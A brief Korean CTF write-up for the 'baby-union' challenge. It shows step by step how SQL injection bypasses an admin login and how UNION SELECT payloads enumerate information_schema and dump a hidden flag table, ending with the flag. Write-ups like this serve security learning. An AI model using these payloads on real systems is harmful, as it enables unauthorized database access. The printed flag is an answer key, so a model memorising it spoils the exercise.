[LEVEL 1] baby-union

문제

첫 페이지

페이지를 들어가면 이런 화면이 뜬다.

admin 로그인

admin 로그인을 시도했다. 

admin'#
s

admin 로그인 성공

---

fake_table_name괴 fake_col 알아내기 위해 해당 코드를 넣어주었다.

a' union select version(),null,null,null
#

 

알맞게 출력된다. 

---

table_name을 알기 위해 다음 코드를 작성해주었다.

' union select table_name, null, null, null from information_schema.tables#
#

성공적으로 출력된다. 

onlyflag라는 테이블이 있었고 이것이 수상해보여 출력하기로했다. 

---

' union select column_name, null, null, null from information_schema.columns where table_name='onlyflag' #
#

 

이렇게 출력되었다. 

이중에서 sflag값이 의미 있어 보인다. 

 

' union select svalue, sflag, null, sclose from onlyflag #
#

이렇게 작성하면 다음과 같은 화면이 나온다.

DH{57033624d7f142f57f139b4c9e84bd78da77b4406896c386672f0cbb016f5873}